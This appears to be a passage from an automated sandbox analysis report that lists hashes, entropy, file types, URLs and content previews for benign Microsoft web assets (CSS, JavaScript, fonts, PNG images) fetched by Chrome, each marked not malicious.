                                                                                                                      SSDEEP:6:Q3RnadmyWRLnadIrM9nadYErmC+LGI1nadmWYElnH0IASS3c7swWJ/cxGPvZ/c8e:cYdIRGdIg8dlHEGIUd4Eh0IA1cbWNb9u
                                                                                                                      MD5:F81E446FAC9DB5FB37845DD4E069AE27
                                                                                                                      SHA1:DE12C417D44EC6A6AC52D5D41BBB35CE8C9A2097
                                                                                                                      SHA-256:CD4B2B854F0E1BF350B4E61D015794D0F33A0B187A0C78912085E4DB1CD65F0B
                                                                                                                      SHA-512:E13DDEDB6117E516E4278E4F1B6AA80DD62EAF8966E64F5D45D452D85FE2AAD990D770101934BC12AA37B4CDF8D3B3B86DDBD116B53E7C1AE1BFD73AA9C18584
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/back-to-top-button/v1/back-to-top-button/clientlibs/sites.min.ACSHASHf81e446fac9db5fb37845dd4e069ae27.js
                                                                                                                      Preview:'use strict';$(function(){var a=document.querySelector("#msChatContainer"),b=document.querySelector(".back-to-top.sticky"),c=document.querySelector(".fixed-back-to-top.fixed-sticky"),d=!(!document.querySelector("#storeassistantroot")||!window.storeAssistantReactJsLib);a&&b&&!d&&$(b).addClass("pageHasChatContainer");a&&c&&!d&&$(c).addClass("pageHasChatContainer")});
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (34235), with CRLF, LF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):100769
                                                                                                                      Entropy (8bit):5.246112939487446
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:nmwNxXC4Pn+lnTKxKdzW7I1m7H+8l9ut+EVe/EdnoEnsJ:mwFwTXqwe/EdnoEnsJ
                                                                                                                      MD5:6FE3DD83A0D98BC1977F57EA33C37693
                                                                                                                      SHA1:8DF606F40E4CC8C07CE929D5A82FD5304EAF4EB7
                                                                                                                      SHA-256:A5268A183F2A091D2D17773997E89A25FC45CBD60E586EDF61F544FB85D6F6A8
                                                                                                                      SHA-512:B81C2EB3BFA8ECF1FFCBB24E4A776CD2B083460A0AC53213EAF48997AC27BB20F49CEFF3A098AEBA33B3AD4F74CA86B5018AFE6689A260F011DF4249029CE78B
                                                                                                                      Malicious:false
                                                                                                                      URL:https://mem.gfx.ms/scripts/me/MeControl/10.24228.4/en-US/meCore.min.js
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 297 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6270
                                                                                                                      Entropy (8bit):7.945330124411617
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:zS7+uH6tmhCSqN0K4Wykh3YMBYpAjav+tlXQ:m7vHqS9WyiooqSa2m
                                                                                                                      MD5:5C04A186E00E47C2F90ED18E03AB4093
                                                                                                                      SHA1:AC859795B92E3FA0FA88868AF532A3ED6F30F12A
                                                                                                                      SHA-256:1A16DBCD6926721D9C3AEB85429586B307F11D2093CF9AEEFDAA37898CB74D46
                                                                                                                      SHA-512:909830B01A21E61D98ADF1C61DFC44BD414CF03C51250A9DD7B5C26FB12D6334D984A21F25B5ED089FFDED4CAAA764579EEA317470C8616B7928E989B1A1778A
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):16
                                                                                                                      Entropy (8bit):3.625
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Hfn:/n
                                                                                                                      MD5:BEB5075867AC37A3C8903AB23A5ABA22
                                                                                                                      SHA1:86A41106441F795558A31574CBD24D5403E2F054
                                                                                                                      SHA-256:BD38B37956C818D4084814F47B69B7798F07AF7889D3D13DEBBD2D76ECB86095
                                                                                                                      SHA-512:976D88CFEF9792BC882CA8BB7F7F784BB97EA2046999D67C43DD4C2391943238BF9EE3DECD50DC2495829E65E9281D999E1272B188B489B1AFF59AECEE3E139A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkV74dSiH35ARIFDel_Cl4=?alt=proto
                                                                                                                      Preview:CgkKBw3pfwpeGgA=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):184
                                                                                                                      Entropy (8bit):4.7576002313728605
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:iAE3BMiX4RXBMgX/UfVgVISfKxW4qUu5UtgseBWBZ8VNZOjmeJRNnXE1V+o+:iAE36iIsgP0KOFMLs9cVNKmV+o+
                                                                                                                      MD5:8396009A793FDA25F0AD1C495EC773F4
                                                                                                                      SHA1:C0143C8B9F459323B1AE10D739835E5C8546DC0D
                                                                                                                      SHA-256:D660C1B711D4F046EC54D6681BF6B8664875AFA538957C7A9A874A9D09001D4F
                                                                                                                      SHA-512:C11201AF295FB01B5B585CB3BE448E0573ED5B96C4FB24B2E63809CDE741D2B1903F00FCA14F760262E7045C6FAC47545C4B3D4E45F94A4C28C51B59AD6ECC38
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/areaheading/v1/areaheading/clientlibs/site.min.ACSHASH8396009a793fda25f0ad1c495ec773f4.css
                                                                                                                      Preview:.areaheading .sr-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal !important}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 36748, version 0.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):36748
                                                                                                                      Entropy (8bit):7.993571055882259
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:768:J1RjXb4nQ5CZV6qEfz1mfNwUcf0Rn//WAlsuqjCf8qs2opmUrYSRc:RXEnQ5fzAlVe0R//WAx7b//Uxc
                                                                                                                      MD5:88749B8058F99835F5A6B87FCC9CEDA1
                                                                                                                      SHA1:A491726E067475E187E270D4469A96E016BD30A7
                                                                                                                      SHA-256:F447D199F99F6EC55B5308B737A69F384032D3D0C1D05FBC41782AA50ECEB92C
                                                                                                                      SHA-512:D595CC3E4220CB879389138D34B2DFBC9DC40EA5E83A81944FA73CBDFBBFC70D53285F8A11CEB921F55C7171EFB4A1242AE1819F0A505C0ECA06772357B2AF65
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/fonts/support-icons/fluent/latest_v1_95.woff2
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (26071), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):26086
                                                                                                                      Entropy (8bit):5.432818104736514
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:us282x+ZOj5jMGgKAztoDx3SF/uuRcFoyJD53QDCMkDoEo91YGtua6ca+D+oOLcG:arB/0FxO4Qcr9SGYafV5G
                                                                                                                      MD5:A923FB946929633E387E4D2017006546
                                                                                                                      SHA1:84D3DCF57A9EF34EA731A1B28F9ECE4B0B267A08
                                                                                                                      SHA-256:67A664918FD7F224CCE362DB7078440CD693E1EF6B30EFF33C06F112C17102FA
                                                                                                                      SHA-512:A974D3511DD1ED3197BC6A90F9561CDB83120E99D8276C38E32C79005E59C5C7048C8652E3DF5A1DB06191B3B6793A4C75A5C2060CC12ACB36D1E6F31C2E6BFB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/Article/css.css?v=Z6ZkkY_X8iTM42LbcHhEDNaT4e9rMO_zPAbxEsFxAvo
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):406
                                                                                                                      Entropy (8bit):4.645093417199183
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:M9BAG1/qAT9BAs1/qKdDYT9BAR6T9BAOk/CMRZcJfRDZ:M9p/qS91/qfT9J9yRC5N
                                                                                                                      MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                                                                      SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                                                                      SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                                                                      SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                                                                      Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65460)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):566897
                                                                                                                      Entropy (8bit):5.427009136389396
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:XU3oul3BmWRE2cXXB6l4QK/AAcRDsEbXiTMTyMm6KfjzVV/2GrKJB:XQY22kuQ4PJV/2GrKJB
                                                                                                                      MD5:C0BB28600CF931A17482376C5E27CABE
                                                                                                                      SHA1:3C9B65F94334C9312F168AC51D2067D07DB3A619
                                                                                                                      SHA-256:70EB3BBB025DC4C9CB7F7297EF68B928E4A7D9F77F8B60BD4DE6C526CF195464
                                                                                                                      SHA-512:5957C114E0A04A949C6B8D8C104F62D810079DA249B87C8E5D3183AD7E57A4B2657C9C7BE8C87FC990754FFD8B30BEC8719A1279AB7B6ECEB114D12690007268
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/ucs/dist/ucsCreativeService.js?v=cOs7uwJdxMnLf3KX72i5KOSn2fd_i2C9TebFJs8ZVGQ
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):106
                                                                                                                      Entropy (8bit):4.458110094106728
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:tM2Vx6IUARGvdMFev/KKgJWnLgsMoiFiAn:tZViARGvqeqrJWn6omiAn
                                                                                                                      MD5:0FA38DB43EB641C9AC1CA868CE3D294F
                                                                                                                      SHA1:ED3CC5587BAFFD322B16002184FC8581929A953F
                                                                                                                      SHA-256:81EC0312140FFDCF5216A8F1336E2D5909896CD0AAED9E22E60F3BFE7F78B798
                                                                                                                      SHA-512:44745BBE21317827C76FDD62CDD7982F794D02C1BCA576C4B822ABD81BFEFDDC273FF335EFBE912AD6D15571664C28A01B1C8059E50945B667FDFFC330574F68
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/socialfollow/v1/socialfollow/clientlibs/site.min.ACSHASH0fa38db43eb641c9ac1ca868ce3d294f.css
                                                                                                                      Preview:@media screen and (max-width: 320px) {. .socialfollow-ul {. margin-top: 2px !important; . }.}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):171505
                                                                                                                      Entropy (8bit):5.043804815226508
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                                                                      MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                                      SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                                      SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                                      SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                      Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (10387), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10930
                                                                                                                      Entropy (8bit):4.777922581824855
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:4CGjCf1IQNnJ0DuXGJzhIGcjfkfN9xekArvsAJKom+tmTjotKfCYzwsm1L+mFb:4CGjCf3Nn2DuWPlPIvPm+trQfCYiL+wb
                                                                                                                      MD5:509E44BDCA06692FD924908DE96BE75B
                                                                                                                      SHA1:2B68EABA6109F02706D13775CBC357CA40785ABE
                                                                                                                      SHA-256:37D8CC7CC2283BFB3B3804CDD23E4B62A98EF4C0AA1C38DFA5A515D91B9A132F
                                                                                                                      SHA-512:44E648E2433C01B879CF952AD1ACBAEE97EF82C18F846429019EF343E5272B568BE3BD9CC530E244E1E282D7CF42A1D215E79756968A4D82B845F0E242551ACF
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/glyphs/glyphs.css?v=N9jMfMIoO_s7OATN0j5LYqmO9MCqHDjfpaUV2RuaEy8
                                                                                                                      Preview:..icon-fluent{font-family:Support Fluent Icons;font-style:normal;font-weight:normal;line-height:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.supTabControlHeader .supTabControlHeaderActive .icon-fluent{font-weight:900;color:#000}.supTabControlHeader .icon-fluent{color:gray;font-size:.9em;padding-right:5px}html[dir=rtl] .supTabControlHeader .icon-fluent{padding-left:5px}.icon-mdl2{font-family:Support MDL2 Assets;font-style:normal;font-weight:normal;line-height:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.supTabControlHeader .supTabControlHeaderActive .icon-mdl2{font-weight:900;color:#000}.supTabControlHeader .icon-mdl2{color:gray;font-size:.9em;padding-right:5px}html[dir=rtl] .supTabControlHeader .icon-mdl2{padding-left:5px}.icon-accept:before{content:"."}.icon-actioncenter:before{content:"."}.icon-actioncenternotification:before{conten
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (42133)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):138268
                                                                                                                      Entropy (8bit):5.224497765711851
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                                      MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                      SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                      SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                      SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                                                                      Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26647
                                                                                                                      Entropy (8bit):7.961164465196959
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:nhL1z7tVW03Npmi6K0i1WRphEQAjQLj9I32JxMqJn26OsNCVbgP6re0QG9d8b1P:h1zXWKYi90i+Az3cxMqV26pNAeTG9do
                                                                                                                      MD5:7343B003F48E30FBDDF87CFC795E860A
                                                                                                                      SHA1:12FF2D14D7666F516CAF23848113902A7D5570C6
                                                                                                                      SHA-256:B8B3DBA0B8C52DB7CCBFAD56815F0F38E83895488101C51AA580AD581D7115CC
                                                                                                                      SHA-512:39E291A9E69D1D22B414428148EA7795FF1D33F875BF823F0E8C96276431E7AAE5A1B4EF7F050492B9903214B5FE7B9B4C92FF1B68A03A614258BA04605640C5
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...g.IDATx....wUU./...`.2j2.&C `.X....L.H.b.1.B...1*.J.%5..Z%2....EH.$..../........~..y....=...Y....s....{.s.*+V.X..b.UVa.]..X5........:N.Z...5d.C.5.9.Yvl^..8....\im..h...M.9....l3[...h..w......f..:..'.W..2....y.(.$'..TD....].S.NSx(.z...J...~.!.b.J..o.AE.B.A.......>f:...:&...eYDTOV!....(E.G..&1.+.JY...&|J..M.K...J....w.$.h2...G1..[....}.....2E7a.rs.;..o....|.e..m...e.1..(.k.r...K".\.K.)..".(J..p.>.."*v...|..7.1C.L........S.w.g;....w....QB%.....%.Z].S..S../=.._.. -.......C..}b.....m..-..W..es....N....y..-.nS.T%..t3.IZQ.?.....R..Zxp.$yIc.....&d...2|.]...'...>.....&.T.'...B..%......Oj.Q....xkFR...+.|yH.s.B..>...*..J.SW,...Z.*d(...*.v..&,Y....Sf.....K.m.E.WL.~.B.D...&..c.Z..|l.li$.$.V.P}.BJ.~.p...T.IM..1>.'cn........!..6CR*&..Y.r.k....=.nL.->....2W......9...J....c.`S8A...R...(Q.N.V+K+.-........*..[b..]._{.."%D'-...e...R'...k.T!.(...Q...>R.#.-Y.}\......U*T../..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1116
                                                                                                                      Entropy (8bit):4.788804799444485
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:L0xLFaXgj7O6mpLQqVBeVBr/LSxLSUS3Gpz:oxLFcwC6m1lVBeVBfSpSUS2Z
                                                                                                                      MD5:A054C8B2496A3D3097DACFA8BFBC6FEA
                                                                                                                      SHA1:B0F4A4CEC9C5D8C0899C61A6BA57030F41F1B54D
                                                                                                                      SHA-256:8C37F488ABB2EDF4CD90371137279F5FF32BFD8CF7ED47CC9A73380E2A5500CD
                                                                                                                      SHA-512:5161FC704908D7D43AA04549CE7F309810951B3B1D1C1330A3E564F2DA868E93B1DC7A4D1F4C25267F2C6017ED79BE7FE5287858E31257B00293B4DF2AA47A61
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-windows.min.ACSHASHa054c8b2496a3d3097dacfa8bfbc6fea.css
                                                                                                                      Preview:.blue-offer-banner .banner a{color:#fff !important;line-height:1.4;border:0;text-decoration:none;font-size:15px;font-weight:400}..blue-offer-banner{margin-top:-2px}..blue-offer-banner .banner a:hover{text-decoration:underline}..blue-offer-banner .banner a span:before{position:relative;right:.2rem !important;top:2px}..blue-offer-banner.alert{min-height:auto !important}.html[dir=rtl] .blue-offer-banner .banner a span:before{position:absolute;right:auto !important;left:-15px;margin:inherit}.@media only screen and (max-width:539px){.mosaic-mobile-card-stacking div.mosaic.mr-5.ml-5{padding-left:0 !important;padding-right:0 !important;margin-left:0 !important;margin-right:0 !important}..mosaic-mobile-card-stacking .mosaic-tile .mosaic-card{flex-direction:column !important}..mosaic-mobile-card-stacking .mosaic-tile .mosaic-card .position-absolute{position:relative !important}.}..MLSD .showmore-custom-container.showmoreshowless>.container{margin:auto !important}..MLSD .article-custom-container
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1789), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1789
                                                                                                                      Entropy (8bit):4.949297796790656
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:s02Yxod02La21d02/YKdXSd02WwKnccd02+49XX3Xsd02wGy/rd02XLryWrrd02O:sAwzXH2+9WqXHXW4GuJ/v9M
                                                                                                                      MD5:49696FC959CE2121F8FC42BC0A295EDF
                                                                                                                      SHA1:353FE5D1F17B396C81383059C66E73574991A78B
                                                                                                                      SHA-256:E0CFF5C0E0126AD78EB3DCDDA610AD22A32FB4AA37EBA19FEA990E8C3AB3918A
                                                                                                                      SHA-512:AF4C277F64FD43CE18E94EE797FB7C4B3D19BD84B0741DFC30AE6E1FE77809EBB36CAA0341A4A86405D275E0AF63A951E488370F4A689636560049AA71084E05
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/fonts/site-fonts.css?v=4M_1wOASateOs9zdphCtIqMvtKo366Gf6pkOjDqzkYo
                                                                                                                      Preview:@font-face{font-family:"Segoe UI Bold";font-display:swap;font-weight:700;src:local("Segoe UI Bold"),url(segoe-ui/west-european/bold/latest.woff2) format("woff2"),url(segoe-ui/west-european/bold/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Light";font-display:swap;font-weight:100;src:local("Segoe UI Light"),url(segoe-ui/west-european/light/latest.woff2) format("woff2"),url(segoe-ui/west-european/light/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Semibold";font-display:swap;font-weight:600;src:local("Segoe UI Semibold"),url(segoe-ui/west-european/semibold/latest.woff2) format("woff2"),url(segoe-ui/west-european/semibold/latest.woff) format("woff")}@font-face{font-family:"Segoe UI Semilight";font-display:swap;font-weight:200;src:local("Segoe UI Semilight"),url(segoe-ui/west-european/semilight/latest.woff2) format("woff2"),url(segoe-ui/west-european/semilight/latest.woff) format("woff")}@font-face{font-family:"Segoe UI";font-display:swap;font-weight:400;src:
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (4370), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4370
                                                                                                                      Entropy (8bit):5.070419363669657
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:yUD4Nf5fpk+9/FPV/A/xtrmAxdAe8RiM1MTMNOMx7UIF/A1ERu84jC7UO7Flt8zx:b4TJ96rrmAxdAe8RiM1MTMNOMx7UIF/o
                                                                                                                      MD5:5F05B23BAD0F2D477C4E6B9266F99A74
                                                                                                                      SHA1:E6CC0BE0A86B8330B4FD16CE8EB27614FB313B40
                                                                                                                      SHA-256:70099F944DDCE86C3B9E24CE88C3C489EF4C63CEF20C4DA64A5DC33BBFE36512
                                                                                                                      SHA-512:664E997252C7A41F8D4E7A3FD34592D25809AFCD4EF9FB7A2542F9A3C05FC8F841D5F7E58DBF0A6F00C255F43C6A36D6597DDF5C7A0FFC049994002CC851ECB8
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/promotionbanner/promotion-banner.css?v=cAmflE3c6Gw7niTOiMPEie9MY87yDE2mSl3DO7_jZRI
                                                                                                                      Preview:/*! Copyright (C) Microsoft. All rights reserved. */.uhfupgradeBanner{display:block;max-height:110px;border-bottom:.5px solid #aeaeae;box-shadow:0 1px 5px 3px #ccc;margin-bottom:10px}.uhfupgradeBanner .uhfbanner-container{max-width:1640px;max-height:inherit;display:block;position:relative;width:92%;margin-left:auto;margin-right:auto;padding-left:1vw;padding-right:1vw}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper{display:flex;flex-wrap:wrap;max-height:inherit}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper .uhfbanner-content{width:75%;align-items:stretch;float:left;position:relative;padding-top:1.5em;padding-bottom:1.5em;max-height:inherit}.uhfupgradeBanner .uhfbanner-container .uhfbanner-wrapper .uhfbanner-controls-wrapper{align-items:stretch;float:left;position:relative;padding-top:1.1vw;padding-bottom:1vw;width:24%}.uhfupgradeBanner .uhfbanner-controls{float:right}.uhfupgradeBanner .promoHeading{font-weight:600;font-size:20px;margin:0;position:relative;font-fami
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2974), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2974
                                                                                                                      Entropy (8bit):5.078147905018725
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:5hpNPWqBPWsQxmpqrqysQxmpqAYP6PAQxmpqIQxmpqNs7QRlDAALAGaCqDY7KXKe:572MYXsVGQyfZ
                                                                                                                      MD5:8C4035FBAA828A7E23B8584328FE8F88
                                                                                                                      SHA1:F222869596F1E3E94C131DE6E85BF233ED1EC511
                                                                                                                      SHA-256:0F4950468225BC51D24014536FE8004392A415EF01F0DB92A258818E74F9C59E
                                                                                                                      SHA-512:74D807189427397E2C8FC35D986616C1104E9125B39F885F61D9A1AA225D566AB3474061B39C64FF69886E5AEA8D6B4C9F28B4DCC9CB6F552D90DB0C651582DB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/sitewide/articleCss-overwrite.css?v=D0lQRoIlvFHSQBRTb-gAQ5KkFe8B8NuSoliBjnT5xZ4
                                                                                                                      Preview:div.shimmer-effect{display:flex;width:100%;height:300px}.shimmer-line-container{display:flex;flex-direction:column;width:100%;height:100%}.shimmer-line{background-color:#edebe9;position:relative}.banded-wrapper-reversed:nth-child(odd) .shimmer-line{background-color:#d7d4d2;position:relative}.banded-wrapper-reversed:nth-child(odd) .shimmer-line::before{content:"";width:50%;height:100%;position:absolute;top:0;left:0;background:linear-gradient(to right, #d7d4d2 0%, #b9b9b9 50%, #d7d4d2 100%);animation:shimmer 2s ease-out infinite}.banded-wrapper:nth-child(even) .shimmer-line{background-color:#d7d4d2;position:relative}.banded-wrapper:nth-child(even) .shimmer-line::before{content:"";width:50%;height:100%;position:absolute;top:0;left:0;background:linear-gradient(to right, #d7d4d2 0%, #b9b9b9 50%, #d7d4d2 100%);animation:shimmer 2s ease-out infinite}.shimmer-image-container{position:absolute;right:0;width:50%;top:5%}.banded-wrapper-reversed:nth-child(odd) .shimmer-image{position:relative;heig
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
